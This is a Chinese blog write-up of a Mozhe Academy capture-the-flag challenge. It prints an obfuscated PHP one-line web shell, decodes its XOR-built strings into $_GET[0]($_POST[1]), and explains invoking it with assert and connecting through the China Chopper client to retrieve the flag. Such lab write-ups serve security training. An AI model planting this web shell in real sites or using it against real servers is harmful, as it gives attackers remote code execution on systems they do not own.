美文网首页工作生活
墨者学院-PHP代码分析溯源(第1题)

墨者学院-PHP代码分析溯源(第1题)

作者: nohands_noob | 来源:发表于2019-07-02 20:23 被阅读0次

    靶场地址:

    https://www.mozhe.cn/bug/detail/UW5xcFhsWE05akxJYjB1TzEyM2p3UT09bW96aGUmozhe

    进入靶场,标题是b.php源码
    然后映入眼帘的是一串看不懂的字符


    b.php源码

    <?php @$_++;$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("("^"|");${$__}[!$_](${$___}[$_]); ?>

    其实这是一句话木马的变种,整理下
    $_原来的值为0,经过$_++,变成1
    在python中将字符的异或进行计算,解得$__=_GET,$___=_POST

    解得的字符

    $_布尔值为True,!$_则为False,值为0
    整理${$__}[!$_](${$___}[$_]);得到 $_GET[0]($_POST[1]),是不是很眼熟,这其实就是一句话木马
    提交参数b.php?0=assert,代码就变成了<?php assert($_POST[1]); ?>
    因此上菜刀,密码为1,连接:

    获得key

    一句话变种参考:https://www.freebuf.com/articles/web/155891.html

    相关文章

      网友评论

        本文标题:墨者学院-PHP代码分析溯源(第1题)

        本文链接:https://www.haomeiwen.com/subject/fkqhhctx.html